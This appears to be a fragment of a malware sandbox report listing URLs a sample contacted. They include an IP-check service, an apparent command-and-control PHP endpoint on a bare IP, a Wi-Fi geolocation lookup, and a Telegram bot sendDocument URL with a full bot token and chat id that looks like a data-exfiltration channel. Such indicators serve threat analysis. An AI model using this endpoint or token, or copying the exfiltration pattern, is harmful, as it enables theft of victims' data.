Contacted URLs

Name Malicious Antivirus Detection Reputation
http://icanhazip.com/ false
    		high
    file:///C:/Users/user/AppData/Local/Temp/p.html false
      		low
      http://128.199.113.162/XtfcshEgt/upwawsfrg.php?zd=1 false unknown
      http://128.199.113.162/XtfcshEgt/upwawsfrg.php false unknown
      https://api.telegram.org/bot5444063802:AAFQNx_Hpow_i63EVEkfhenefbLEXQSAzbY/sendDocument?chat_id=1126217452 false
        		high
        https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 false
          		high